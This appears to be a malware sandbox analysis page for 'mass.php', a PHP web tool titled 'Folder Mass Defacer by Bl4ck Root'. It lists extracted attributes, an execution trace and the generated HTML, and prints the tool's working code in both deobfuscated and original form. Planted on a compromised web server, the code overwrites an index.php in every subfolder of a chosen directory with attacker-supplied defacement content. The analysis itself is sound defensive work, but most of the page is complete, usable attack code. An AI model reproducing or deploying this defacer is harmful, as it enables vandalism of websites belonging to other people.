mass.php

md5: bfa2adb5a42ea5ebc6d711e3211bb80c

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
getcwd (Deobfuscated, Original, Traces)

Files
file_put_contents (Deobfuscated)

Input
_POST (Deobfuscated, Original)

Title
Folder Mass Defacer by Bl4ck Root (Deobfuscated, HTML, Original)

URLs
http://ac-team.ml/bg.jpg (Deobfuscated, HTML, Original)
http://fonts.googleapis.com/css?family=Electrolize (Deobfuscated, HTML, Original)
https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

echo "<title>Folder Mass Defacer by Bl4ck Root</title>";
echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
echo "<body bgcolor='gray'><font color=black'><font face='Electrolize'>";
echo "<center><form method='POST'>";
echo "<img src='https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png'> <hr color='black'><font color='black'>Target Folder</font><br> <input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='" . getcwd() . "'><br><br>";
echo "<font color='black'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'><br>";
echo "<font color='black'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by Bl4ck Root</textarea><br>";
echo "<input type='submit' value='Mass !!!'></form></center>";
if (isset($_POST['base_dir'])) {
    if (!file_exists($_POST['base_dir'])) {
        die($_POST['base_dir'] . " Not Found !<br>");
    }
    if (!is_dir($_POST['base_dir'])) {
        die($_POST['base_dir'] . " Is Not A Directory !<br>");
    }
    @chdir($_POST['base_dir']) or die("Cannot Open Directory");
    $files = @scandir($_POST['base_dir']) or die("Fuck u -_- <br>");
    foreach ($files as $file) {
        if ($file != "." && $file != ".." && @filetype($file) == "dir") {
            $index = getcwd() . "/" . $file . "/" . $_POST['andela'];
            if (file_put_contents($index, $_POST['index'])) {
                echo "<hr color='black'>>> <font color='black'>{$index}&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(&#10003;)</font>";
            }
        }
    }
}
Execution traces
data/traces/bfa2adb5a42ea5ebc6d711e3211bb80c_trace-1676251629.3818.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:27:35.279633]
1	0	1	0.000305	393512
1	3	0	0.000407	405712	{main}	1		/var/www/html/uploads/mass.php	0	0
2	4	0	0.000424	405712	getcwd	0		/var/www/html/uploads/mass.php	1	0
2	4	1	0.000438	405760
2	4	R			'/var/www/html/uploads'
1	3	1	0.000456	405712
			0.000484	314224
TRACE END   [2023-02-12 23:27:35.279968]

Generated HTML code
<html><head><title>Folder Mass Defacer by Bl4ck Root</title><link href="http://fonts.googleapis.com/css?family=Electrolize" rel="stylesheet" type="text/css"></head><body bgcolor="gray"><font color="black'"><font face="Electrolize"><center><form method="POST"><img src="https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png"> <hr color="black"><font color="black">Target Folder</font><br> <input cols="10" rows="10" type="text" style="color:lime;background-color:#000000" name="base_dir" value="/var/www/html"><br><br><font color="black">Name of File</font><br><input cols="10" rows="10" type="text" style="color:lime;background-color:#000000" name="andela" value="index.php"><br><font color="black">Script Deface</font><br><textarea cols="25" rows="8" style="color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);" name="index">Hacked by Bl4ck Root</textarea><br><input type="submit" value="Mass !!!"></form></center></font></font></body></html>
Original PHP code
<?php echo "<title>Folder Mass Defacer by Bl4ck Root</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='gray'><font color=black'><font face='Electrolize'>"; echo "<center><form method='POST'>"; echo "<img src='https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png'> <hr color='black'><font color='black'>Target Folder</font><br> <input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='".getcwd ()."'><br><br>"; echo "<font color='black'>Name of File</font><br><input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'><br>"; echo "<font color='black'>Script Deface</font><br><textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by Bl4ck Root</textarea><br>"; echo "<input type='submit' value='Mass !!!'></form></center>"; if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("Fuck u -_- <br>"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['andela']; if (file_put_contents ($index, $_POST['index'])) echo "<hr color='black'>>> <font color='black'>$index&nbsp&nbsp&nbsp&nbsp</font><font color='lime'>(&#10003;)</font>"; } endforeach; } ?>
PHP Malware Analysis

mass.php

md5: bfa2adb5a42ea5ebc6d711e3211bb80c

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
